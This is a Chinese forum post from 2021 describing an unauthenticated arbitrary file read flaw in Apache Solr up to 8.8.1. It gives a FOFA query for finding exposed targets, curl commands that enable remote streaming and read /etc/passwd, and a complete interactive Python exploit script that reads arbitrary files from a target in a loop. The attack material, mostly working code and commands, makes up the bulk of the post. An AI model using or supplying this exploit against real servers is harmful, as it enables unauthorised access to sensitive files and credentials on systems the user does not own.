|
|
原文链接:Apache Solr 任意文件读取漏洞
一、 漏洞描述
Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件
 
二、 漏洞影响
Apache Solr <= 8.8.1
三、 漏洞复现
看文章的时候发现有师傅发了 Apache Solr 的文件读取漏洞
那就复现一波啦
FOFA:Apache Solr <= 8.8.1
访问 Solr Admin 管理员页面
获取core的信息http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json
发送请求
再进行文件读取
- Curl请求为
- curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xxx.xxx.xxx.xxx:8983/solr/{corename}/config -H 'Content-type:application/json'
- curl "http://xxx.xxx.xxx.xxx:8983/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file://etc/passwd"
四、漏洞POC
POC还是建立在未授权访问的情况下
- import requests
- import sys
- import random
- import re
- import base64
- import time
- from lxml import etree
- import json
- from requests.packages.urllib3.exceptions import InsecureRequestWarning
- def title():
- print('+------------------------------------------')
- print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
- print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
- print('+ \033[34m公众号 : PeiQi文库 \033[0m')
- print('+ \033[34mVersion: Apache Solr < 8.2.0 \033[0m')
- print('+ \033[36m使用格式: python3 poc.py \033[0m')
- print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m')
- print('+ \033[36mFile >>> 文件名称或目录 \033[0m')
- print('+------------------------------------------')
- def POC_1(target_url):
- core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
- try:
- response = requests.request("GET", url=core_url, timeout=10)
- core_name = list(json.loads(response.text)["status"])[0]
- print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
- return core_name
- except:
- print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
- sys.exit(0)
- def POC_2(target_url, core_name):
- vuln_url = target_url + "/solr/" + core_name + "/config"
- headers = {
- "Content-type":"application/json"
- }
- data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
- try:
- requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
- response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
- print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))
- if "This" in response.text and response.status_code == 200:
- print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
- else:
- print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
- sys.exit(0)
- except Exception as e:
- print("\033[31m[x] 请求失败 \033[0m", e)
- def POC_3(target_url, core_name, File_name):
- vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
- headers = {
- "Content-Type": "application/x-www-form-urlencoded"
- }
- data = 'stream.url=file://{}'.format(File_name)
- try:
- requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
- response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
- if "No such file or directory" in response.text:
- print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
- else:
- print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"]))
- except Exception as e:
- print("\033[31m[x] 请求失败 \033[0m", e)
- if __name__ == '__main__':
- title()
- target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
- core_name = POC_1(target_url)
- POC_2(target_url, core_name)
- while True:
- File_name = str(input("\033[35mFile >>> \033[0m"))
- POC_3(target_url, core_name, File_name)
五、参考文章
https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ
|
|
发表于 2021-3-18 22:12:36